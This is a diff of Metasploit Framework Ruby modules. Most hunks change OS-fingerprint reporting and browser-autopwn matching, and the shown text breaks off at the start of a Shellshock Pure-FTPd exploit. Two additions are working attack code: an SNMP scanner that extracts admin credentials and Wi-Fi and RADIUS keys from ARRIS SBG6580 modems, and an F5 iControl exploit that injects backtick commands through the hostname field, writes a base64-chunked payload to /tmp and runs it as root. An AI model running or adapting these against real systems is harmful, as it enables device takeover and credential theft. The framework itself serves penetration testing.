}
|
||||
|
||||
conf[:os_sp] = res['sp'] if res['sp']
|
||||
conf[:os_lang] = res['lang'] if res['os'] =~ /Windows/
|
||||
conf[:SMBName] = simple.client.default_name if simple.client.default_name
|
||||
conf[:SMBDomain] = simple.client.default_domain if simple.client.default_domain
|
||||
|
||||
# Report a fingerprint.match hash for name, domain, and language
|
||||
# Ignore OS fields, as those are handled via smb.fingerprint
|
||||
report_note(
|
||||
:host => ip,
|
||||
:port => info[0],
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:ntype => 'smb.fingerprint',
|
||||
:data => conf
|
||||
:ntype => 'fingerprint.match',
|
||||
:data => match_conf
|
||||
)
|
||||
|
||||
else
|
||||
report_service(:host => ip, :port => info[0], :name => 'smb')
|
||||
print_status("#{rhost} could not be identified")
|
||||
desc = "#{res['native_os']} (#{res['native_lm']})"
|
||||
report_service(:host => ip, :port => rport, :name => 'smb', :info => desc)
|
||||
print_status("#{rhost}:#{rport} could not be identified: #{desc}")
|
||||
end
|
||||
|
||||
# Report a smb.fingerprint hash of attributes for OS fingerprinting
|
||||
report_note(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:ntype => 'smb.fingerprint',
|
||||
:data => conf
|
||||
)
|
||||
|
||||
disconnect
|
||||
|
||||
break
|
||||
|
|
|
@ -0,0 +1,315 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SNMPClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module',
|
||||
'Description' => 'This module allows SNMP enumeration of the ARRIS / Motorola
|
||||
SURFboard SBG6580 Series Wi-Fi Cable Modem Gateway. It supports the username
|
||||
and password for the device user interface as well as wireless network keys
|
||||
and information.
|
||||
The default community used is "public".',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/May/79' ],
|
||||
[ 'URL', 'http://www.arrisi.com/modems/datasheet/SBG6580/SBG6580_UserGuide.pdf' ],
|
||||
[ 'OSVDB', '110555' ]
|
||||
],
|
||||
'Author' => 'Matthew Kienow <mkienow[at]inokii.com>',
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
# change SNMP version option to match device specification
|
||||
register_options(
|
||||
[
|
||||
OptString.new('VERSION', [ true, 'SNMP Version <1/2c>', '2c' ])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
begin
|
||||
snmp = connect_snmp
|
||||
|
||||
# represents the order of the output data fields
|
||||
fields_order = [
|
||||
"Host IP", "Username", "Password", "SSID", "802.11 Band",
|
||||
"Network Authentication Mode", "WEP Passphrase", "WEP Encryption",
|
||||
"WEP Key 1", "WEP Key 2", "WEP Key 3", "WEP Key 4",
|
||||
"Current Network Key", "WPA Encryption", "WPA Pre-Shared Key (PSK)",
|
||||
"RADIUS Server", "RADIUS Port", "RADIUS Key"
|
||||
]
|
||||
|
||||
output_data = {"Host IP" => ip}
|
||||
|
||||
sys_descr = snmp.get_value('sysDescr.0')
|
||||
if is_valid_snmp_value(sys_descr) and sys_descr.to_s =~ /SBG6580/
|
||||
# print connected status after the first query so if there are
|
||||
# any timeout or connectivity errors; the code would already
|
||||
# have jumped to error handling where the error status is
|
||||
# already being displayed.
|
||||
print_good("#{ip}, Connected.")
|
||||
|
||||
# attempt to get the username and password for the device user interface
|
||||
# using the CableHome cabhPsDevMib MIB module which defines the
|
||||
# basic management objects for the Portal Services (PS) logical element
|
||||
# of a CableHome compliant Residential Gateway device
|
||||
device_ui_selection = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.3.0')
|
||||
if is_valid_snmp_value(device_ui_selection) and device_ui_selection.to_i == 1
|
||||
# manufacturerLocal(1) - indicates Portal Services is using the vendor
|
||||
# web user interface shipped with the device
|
||||
device_ui_username = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0')
|
||||
if is_valid_snmp_value(device_ui_username)
|
||||
output_data["Username"] = device_ui_username.to_s
|
||||
end
|
||||
|
||||
device_ui_password = snmp.get_value('1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0')
|
||||
if is_valid_snmp_value(device_ui_password)
|
||||
output_data["Password"] = device_ui_password.to_s
|
||||
end
|
||||
end
|
||||
|
||||
wifi_ifindex = get_primary_wifi_ifindex(snmp)
|
||||
if wifi_ifindex < 1
|
||||
print_status("Primary WiFi is disabled on the device")
|
||||
end
|
||||
|
||||
ssid = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(ssid)
|
||||
output_data["SSID"] = ssid.to_s
|
||||
end
|
||||
|
||||
wireless_band = snmp.get_value('1.3.6.1.4.1.4413.2.2.2.1.5.1.18.0')
|
||||
if is_valid_snmp_value(wireless_band)
|
||||
output_data["802.11 Band"] = get_wireless_band_name(wireless_band.to_i)
|
||||
end
|
||||
|
||||
network_auth_mode = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.5.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(network_auth_mode)
|
||||
network_auth_mode = network_auth_mode.to_i
|
||||
network_auth_mode_name = get_network_auth_mode_name(network_auth_mode)
|
||||
output_data["Network Authentication Mode"] = network_auth_mode_name
|
||||
end
|
||||
|
||||
case network_auth_mode
|
||||
when 1, 6
|
||||
# WEP, WEP 802.1x Authentication
|
||||
wep_passphrase = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.3.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(wep_passphrase)
|
||||
output_data["WEP Passphrase"] = wep_passphrase.to_s
|
||||
end
|
||||
|
||||
wep_encryption = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.2.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(wep_encryption)
|
||||
wep_encryption = wep_encryption.to_i
|
||||
else
|
||||
wep_encryption = -1
|
||||
end
|
||||
|
||||
wep_encryption_name = "Unknown"
|
||||
wep_key1 = wep_key2 = wep_key3 = wep_key4 = nil
|
||||
# get appropriate WEP keys based on wep_encryption setting
|
||||
if wep_encryption == 1
|
||||
wep_encryption_name = "64-bit"
|
||||
wep_key1 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.1")
|
||||
wep_key2 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.2")
|
||||
wep_key3 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.3")
|
||||
wep_key4 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.2.1.2.#{wifi_ifindex}.4")
|
||||
elsif wep_encryption == 2
|
||||
wep_encryption_name = "128-bit"
|
||||
wep_key1 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.1")
|
||||
wep_key2 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.2")
|
||||
wep_key3 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.3")
|
||||
wep_key4 = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.3.1.2.#{wifi_ifindex}.4")
|
||||
end
|
||||
|
||||
output_data["WEP Encryption"] = wep_encryption_name
|
||||
if is_valid_snmp_value(wep_key1)
|
||||
output_data["WEP Key 1"] = wep_key1.unpack('H*')[0]
|
||||
end
|
||||
if is_valid_snmp_value(wep_key2)
|
||||
output_data["WEP Key 2"] = wep_key2.unpack('H*')[0]
|
||||
end
|
||||
if is_valid_snmp_value(wep_key3)
|
||||
output_data["WEP Key 3"] = wep_key3.unpack('H*')[0]
|
||||
end
|
||||
if is_valid_snmp_value(wep_key4)
|
||||
output_data["WEP Key 4"] = wep_key4.unpack('H*')[0]
|
||||
end
|
||||
|
||||
# get current network key
|
||||
current_key = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.1.1.1.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(current_key)
|
||||
output_data["Current Network Key"] = current_key.to_s
|
||||
end
|
||||
|
||||
if network_auth_mode == 6
|
||||
get_radius_info(snmp, wifi_ifindex, output_data)
|
||||
end
|
||||
|
||||
when 2, 3, 4, 5, 7, 8
|
||||
# process all flavors of WPA
|
||||
wpa_encryption = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.1.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(wpa_encryption)
|
||||
output_data["WPA Encryption"] = get_wpa_encryption_name(wpa_encryption.to_i)
|
||||
end
|
||||
|
||||
wpa_psk = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(wpa_psk)
|
||||
output_data["WPA Pre-Shared Key (PSK)"] = wpa_psk.to_s
|
||||
end
|
||||
|
||||
case network_auth_mode
|
||||
when 4, 5, 8
|
||||
get_radius_info(snmp, wifi_ifindex, output_data)
|
||||
end
|
||||
end
|
||||
|
||||
# output
|
||||
print_line("")
|
||||
print_status("Device information:\n")
|
||||
line = ""
|
||||
width = 30 # name field width
|
||||
|
||||
fields_order.each {|k|
|
||||
if not output_data.has_key?(k)
|
||||
next
|
||||
end
|
||||
|
||||
v = output_data[k]
|
||||
if (v.nil? or v.empty? or v =~ /Null/)
|
||||
v = '-'
|
||||
end
|
||||
|
||||
report_note(
|
||||
:host => ip,
|
||||
:proto => 'udp',
|
||||
:sname => 'snmp',
|
||||
:port => datastore['RPORT'].to_i,
|
||||
:type => "snmp.#{k}",
|
||||
:data => v
|
||||
)
|
||||
|
||||
line << sprintf("%s%s: %s\n", k, " "*([0,width-k.length].max), v)
|
||||
}
|
||||
|
||||
print_line(line)
|
||||
else
|
||||
print_error("#{ip} does not appear to be a SBG6580.")
|
||||
end
|
||||
|
||||
rescue SNMP::RequestTimeout
|
||||
print_error("#{ip} SNMP request timeout.")
|
||||
rescue Rex::ConnectionError
|
||||
print_error("#{ip} Connection refused.")
|
||||
rescue SNMP::InvalidIpAddress
|
||||
print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
|
||||
rescue SNMP::UnsupportedVersion
|
||||
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error("Unknown error: #{e.class} #{e}")
|
||||
elog("Unknown error: #{e.class} #{e}")
|
||||
elog("Call stack:\n#{e.backtrace.join "\n"}")
|
||||
ensure
|
||||
disconnect_snmp
|
||||
end
|
||||
end
|
||||
|
||||
def get_primary_wifi_ifindex(snmp)
|
||||
# The ifTable contains interface entries where each row represents
|
||||
# management information for a particular interface. Locate the first
|
||||
# interface where ifType is 71 (ieee80211) and ifAdminStatus is 1 (up).
|
||||
wifi_ifindex = 0
|
||||
ifTable_columns = ["ifIndex", "ifDescr", "ifType", "ifAdminStatus"]
|
||||
snmp.walk(ifTable_columns) do |ifIndex, ifDescr, ifType, ifAdminStatus|
|
||||
if (wifi_ifindex < 1 and ifType.value == 71 and ifAdminStatus.value == 1)
|
||||
wifi_ifindex = ifIndex.value.to_i
|
||||
end
|
||||
end
|
||||
wifi_ifindex
|
||||
end
|
||||
|
||||
def is_valid_snmp_value(value)
|
||||
if value.nil? or value.to_s =~ /Null/ or value.to_s =~ /^noSuch/
|
||||
return false
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def get_network_auth_mode_name(network_auth_mode)
|
||||
case network_auth_mode
|
||||
when 0
|
||||
"Open Security"
|
||||
when 1
|
||||
"WEP"
|
||||
when 2
|
||||
"WPA-PSK"
|
||||
when 3
|
||||
"WPA2-PSK"
|
||||
when 4
|
||||
"WPA RADIUS"
|
||||
when 5
|
||||
"WPA2 RADIUS"
|
||||
when 6
|
||||
"WEP 802.1x Authentication"
|
||||
when 7
|
||||
"WPA-PSK and WPA2-PSK"
|
||||
when 8
|
||||
"WPA and WPA2 RADIUS"
|
||||
else
|
||||
"Unknown"
|
||||
end
|
||||
end
|
||||
|
||||
def get_wireless_band_name(wireless_band)
|
||||
case wireless_band
|
||||
when 1
|
||||
"2.4 Ghz"
|
||||
when 2
|
||||
"5 Ghz"
|
||||
else
|
||||
"Unknown"
|
||||
end
|
||||
end
|
||||
|
||||
def get_wpa_encryption_name(wpa_encryption)
|
||||
case wpa_encryption
|
||||
when 2
|
||||
"AES"
|
||||
when 3
|
||||
"TKIP+AES"
|
||||
else
|
||||
"Unknown"
|
||||
end
|
||||
end
|
||||
|
||||
def get_radius_info(snmp, wifi_ifindex, output_data)
|
||||
radius_server = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.2.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(radius_server)
|
||||
output_data["RADIUS Server"] = radius_server.unpack("C4").join(".")
|
||||
end
|
||||
|
||||
radius_port = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.3.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(radius_port)
|
||||
output_data["RADIUS Port"] = radius_port.to_s.strip
|
||||
end
|
||||
|
||||
radius_key = snmp.get_value("1.3.6.1.4.1.4413.2.2.2.1.5.4.2.5.1.4.#{wifi_ifindex}")
|
||||
if is_valid_snmp_value(radius_key)
|
||||
output_data["RADIUS Key"] = radius_key.to_s
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -75,13 +75,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/)
|
||||
full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/)
|
||||
this_host = nil
|
||||
|
||||
if full_match
|
||||
print_good("#{rhost}:#{rport} - Identified #{full_match[1]}")
|
||||
report_service(:host => (this_host || ip), :port => rport, :proto => 'tcp', :name => 'https', :info => full_match[1])
|
||||
end
|
||||
|
||||
if os_match and ver_match and build_match
|
||||
if os_match[1] =~ /ESX/ or os_match[1] =~ /vCenter/
|
||||
this_host = report_host( :host => ip, :os_name => os_match[1], :os_flavor => ver_match[1], :os_sp => "Build #{build_match[1]}" )
|
||||
# Report a fingerprint match for OS identification
|
||||
report_note(
|
||||
:host => ip,
|
||||
:ntype => 'fingerprint.match',
|
||||
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }
|
||||
)
|
||||
end
|
||||
return true
|
||||
else
|
||||
|
|
|
@ -114,7 +114,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if os_match and ver_match and build_match
|
||||
if os_match[1] =~ /ESX/ or os_match[1] =~ /vCenter/
|
||||
this_host = report_host( :host => rhost, :os_name => os_match[1], :os_flavor => ver_match[1], :os_sp => "Build #{build_match[1]}" )
|
||||
# Report a fingerprint match for OS identification
|
||||
report_note(
|
||||
:host => ip,
|
||||
:ntype => 'fingerprint.match',
|
||||
:data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] }
|
||||
)
|
||||
end
|
||||
return true
|
||||
else
|
||||
|
|
|
@ -786,8 +786,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Reject exploits whose OS doesn't match that of the
|
||||
# victim. Note that host_info comes from javascript OS
|
||||
# detection, NOT the database.
|
||||
|
||||
# Note that the os_name could be a string, a regex, or
|
||||
# an array of strings and regexes.
|
||||
|
||||
if host_info[:os_name] != "undefined"
|
||||
unless s[:os_name].include?(host_info[:os_name])
|
||||
unless client_matches_module_spec?(host_info[:os_name], s[:os_name])
|
||||
vprint_status("Rejecting #{s[:name]} for non-matching OS")
|
||||
next
|
||||
end
|
||||
|
@ -833,6 +837,27 @@ class Metasploit3 < Msf::Auxiliary
|
|||
return response
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Determines whether a browser string matches an exploit module specification
|
||||
# Example: :os_name => ( 'Windows' | /Windows/ | ['Windows', 'Mac OS X'] )
|
||||
#
|
||||
def client_matches_module_spec?(client_str, module_spec)
|
||||
|
||||
case module_spec
|
||||
when ::String
|
||||
return !! (client_str == module_spec)
|
||||
when ::Regexp
|
||||
return !! client_str.match(module_spec)
|
||||
when ::Array
|
||||
return !! exploit_spec.map{ |spec|
|
||||
client_matches_module_spec?(client_str, spec)
|
||||
}.include?(true)
|
||||
end
|
||||
|
||||
false
|
||||
end
|
||||
|
||||
#
|
||||
# Yields each module that exports autopwn_info, filtering on MATCH and EXCLUDE options
|
||||
#
|
||||
|
@ -886,6 +911,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
os_flavor = nil
|
||||
os_sp = nil
|
||||
os_lang = nil
|
||||
os_device = nil
|
||||
os_vendor = nil
|
||||
arch = nil
|
||||
ua_name = nil
|
||||
ua_ver = nil
|
||||
|
@ -907,15 +934,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if (0 < detected_version.length)
|
||||
detected_version = Rex::Text.decode_base64(Rex::Text.uri_decode(detected_version))
|
||||
print_status("JavaScript Report: #{detected_version}")
|
||||
(os_name, os_flavor, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
|
||||
|
||||
|
||||
(os_name, os_vendor, os_flavor, os_device, os_sp, os_lang, arch, ua_name, ua_ver) = detected_version.split(':')
|
||||
|
||||
if framework.db.active
|
||||
note_data = { }
|
||||
note_data[:os_name] = os_name if os_name != "undefined"
|
||||
note_data[:os_flavor] = os_flavor if os_flavor != "undefined"
|
||||
note_data[:os_sp] = os_sp if os_sp != "undefined"
|
||||
note_data[:os_lang] = os_lang if os_lang != "undefined"
|
||||
note_data[:arch] = arch if arch != "undefined"
|
||||
note_data['os.product'] = os_name if os_name != 'undefined'
|
||||
note_data['os.vendor'] = os_vendor if os_vendor != 'undefined'
|
||||
note_data['os.edition'] = os_flavor if os_flavor != 'undefined'
|
||||
note_data['os.device'] = os_device if os_device != 'undefined'
|
||||
note_data['os.version'] = os_sp if os_sp != 'undefined'
|
||||
note_data['os.language'] = os_lang if os_lang != 'undefined'
|
||||
note_data['os.arch'] = arch if arch != 'undefined'
|
||||
note_data['os.certainty'] = '0.7'
|
||||
print_status("Reporting: #{note_data.inspect}")
|
||||
|
||||
# Reporting stuff isn't really essential since we store all
|
||||
|
@ -926,10 +958,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# ActiveRecord::RecordInvalid errors because 127.0.0.1 is
|
||||
# blacklisted in the Host validations.
|
||||
begin
|
||||
|
||||
# Report a generic fingerprint.match note for the OS normalizer
|
||||
# Previously we reported a javascript_fingerprint type but this
|
||||
# was never used.
|
||||
report_note({
|
||||
:host => cli.peerhost,
|
||||
:type => 'javascript_fingerprint',
|
||||
:data => note_data,
|
||||
:host => cli.peerhost,
|
||||
:ntype => 'fingerprint.match',
|
||||
:data => note_data,
|
||||
:update => :unique_data,
|
||||
})
|
||||
client_info = {
|
||||
|
@ -939,8 +975,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
:ua_ver => ua_ver
|
||||
}
|
||||
report_client(client_info)
|
||||
rescue => e
|
||||
elog("Reporting failed: #{e.class} : #{e.message}")
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
elog("Reporting failed: #{e.class} : #{e.message} #{e.backtrace}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -971,7 +1009,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
@targetcache[key][:host] = {}
|
||||
@targetcache[key][:host][:os_name] = os_name
|
||||
@targetcache[key][:host][:os_vendor] = os_vendor
|
||||
@targetcache[key][:host][:os_flavor] = os_flavor
|
||||
@targetcache[key][:host][:os_device] = os_device
|
||||
@targetcache[key][:host][:os_sp] = os_sp
|
||||
@targetcache[key][:host][:os_lang] = os_lang
|
||||
|
||||
|
|
|
@ -12,18 +12,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
include Msf::Exploit::Android
|
||||
|
||||
VULN_CHECK_JS = %Q|
|
||||
for (i in top) {
|
||||
try {
|
||||
top[i].getClass().forName('java.lang.Runtime');
|
||||
is_vuln = true; break;
|
||||
} catch(e) {}
|
||||
}
|
||||
|
|
||||
|
||||
autopwn_info(
|
||||
:os_flavor => 'Android',
|
||||
:os_name => OperatingSystems::Match::ANDROID,
|
||||
:arch => ARCH_ARMLE,
|
||||
:javascript => true,
|
||||
:rank => ExcellentRanking,
|
||||
:vuln_test => %Q|
|
||||
for (i in top) {
|
||||
try {
|
||||
top[i].getClass().forName('java.lang.Runtime');
|
||||
is_vuln = true; break;
|
||||
} catch(e) {}
|
||||
}
|
||||
|
|
||||
:vuln_test => VULN_CHECK_JS
|
||||
)
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -71,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DefaultTarget' => 0,
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:os_flavor => 'Android'
|
||||
:os_name => OperatingSystems::Match::ANDROID,
|
||||
:vuln_test => VULN_CHECK_JS,
|
||||
:vuln_test_error => 'No vulnerable Java objects were found in this web context.'
|
||||
}
|
||||
))
|
||||
|
||||
|
|
|
@ -0,0 +1,143 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "F5 iControl Remote Root Command Execution",
|
||||
'Description' => %q{
|
||||
This module exploits an authenticated remote command execution
|
||||
vulnerability in the F5 BIGIP iControl API (and likely other
|
||||
F5 devices).
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'bperry' # Discovery, Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-2928'],
|
||||
['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' =>
|
||||
[
|
||||
['F5 iControl', {}]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => "Sep 17 2013",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true]),
|
||||
OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
|
||||
OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
|
||||
OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
get_hostname = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Body>
|
||||
<n1:get_hostname xmlns:n1="urn:iControl:System/Inet" />
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
|
||||
'method' => 'POST',
|
||||
'data' => get_hostname,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
|
||||
res.body =~ /y:string">(.*)<\/return/
|
||||
hostname = $1
|
||||
send_cmd("whoami")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
|
||||
'method' => 'POST',
|
||||
'data' => get_hostname,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
|
||||
res.body =~ /y:string">(.*)<\/return/
|
||||
new_hostname = $1
|
||||
|
||||
if new_hostname == "root.a.b"
|
||||
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Body>
|
||||
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
|
||||
<hostname>#{hostname}</hostname>
|
||||
</n1:set_hostname>
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>
|
||||
}
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
|
||||
'method' => 'POST',
|
||||
'data' => pay,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def send_cmd(cmd)
|
||||
pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
|
||||
<SOAP-ENV:Body>
|
||||
<n1:set_hostname xmlns:n1="urn:iControl:System/Inet">
|
||||
<hostname>`#{cmd}`.a.b</hostname>
|
||||
</n1:set_hostname>
|
||||
</SOAP-ENV:Body>
|
||||
</SOAP-ENV:Envelope>
|
||||
}
|
||||
|
||||
send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
|
||||
'method' => 'POST',
|
||||
'data' => pay,
|
||||
'username' => datastore['USERNAME'],
|
||||
'password' => datastore['PASSWORD']
|
||||
})
|
||||
end
|
||||
|
||||
def exploit
|
||||
filename = Rex::Text.rand_text_alpha_lower(5)
|
||||
|
||||
print_status('Sending payload in chunks, might take a small bit...')
|
||||
i = 0
|
||||
while i < payload.encoded.length
|
||||
cmd = "echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}"
|
||||
send_cmd(cmd)
|
||||
i = i + 5
|
||||
end
|
||||
|
||||
print_status('Triggering payload...')
|
||||
|
||||
send_cmd("sh /tmp/#{filename}")
|
||||
end
|
||||
end
|
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vulnerability exists in the pmd service, due to the insecure usage of functions like
|
||||
strcpy and strcat while handling stack_option packets with user controlled data. In
|
||||
order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
|
||||
the stack and finally build the rop chain to avoid NX.
|
||||
the stack and finally build the ROP chain to avoid NX.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_name => HttpClients::FF,
|
||||
# :ua_minver => "3.5",
|
||||
# :ua_maxver => "3.5",
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking, # reliable memory corruption
|
||||
# :vuln_test => nil,
|
||||
|
|
|
@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# :ua_name => HttpClients::FF,
|
||||
# :ua_minver => "1.0",
|
||||
# :ua_maxver => "1.7.10",
|
||||
# :os_name => OperatingSystems::WINDOWS,
|
||||
# :os_name => OperatingSystems::Match::WINDOWS,
|
||||
# :javascript => true,
|
||||
# :rank => NormalRanking, # reliable memory corruption
|
||||
# :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
|
||||
|
|
|
@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
autopwn_info({
|
||||
:ua_name => HttpClients::OPERA,
|
||||
:ua_maxver => "9.10",
|
||||
:os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ],
|
||||
:os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],
|
||||
:javascript => true,
|
||||
:rank => ExcellentRanking, # reliable cmd exec, cleans up after itself
|
||||
:vuln_test => nil,
|
||||
|
|
|
@ -0,0 +1,116 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
|
||||
'Description' => %q(
|
||||
This module exploits the code injection flaw known as shellshock which
|
||||
leverages specially crafted environment variables in Bash. This exploit
|
||||
specifically targets Pure-FTPd when configured to use an external
|
||||
program for authentication.
